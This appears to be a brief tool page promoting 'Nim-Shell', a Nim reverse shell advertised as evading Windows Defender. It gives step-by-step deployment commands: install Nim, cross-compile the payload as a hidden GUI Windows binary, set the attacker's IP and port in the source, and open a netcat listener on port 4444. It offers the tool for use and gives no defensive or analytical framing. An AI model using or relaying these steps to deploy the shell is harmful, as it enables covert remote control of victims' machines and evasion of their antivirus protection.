Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection

AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H=w640-h192

Reverse shell that can bypass windows defender detection

$ apt install nim

Compilation​

nim c -d:mingw --app:gui nimshell.nim
AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H=w640-h192
Change the IP address and port number you want to listen to in the nimshell.nim file according to your device.
AVvXsEirE2jlCWOsiiK0tmCnN24MtHWXS-INsTNAbbUBXN30MXcYBPgGA4l4qiBB-4yexv1Vv7YSp8iOliPbPwxA_g76HokZjXmyXkHqDRTd63b9Q4wjKFNHJv9tmJlO68jeNt110_QBhbtAC_FqenkUKSRU-QAfvHzIuHDvDEL7Y6osNMF3yxbfDQHUKLT4dWoM=w640-h284

and listen​

$ nc -nvlp 4444
 
뒤로
상단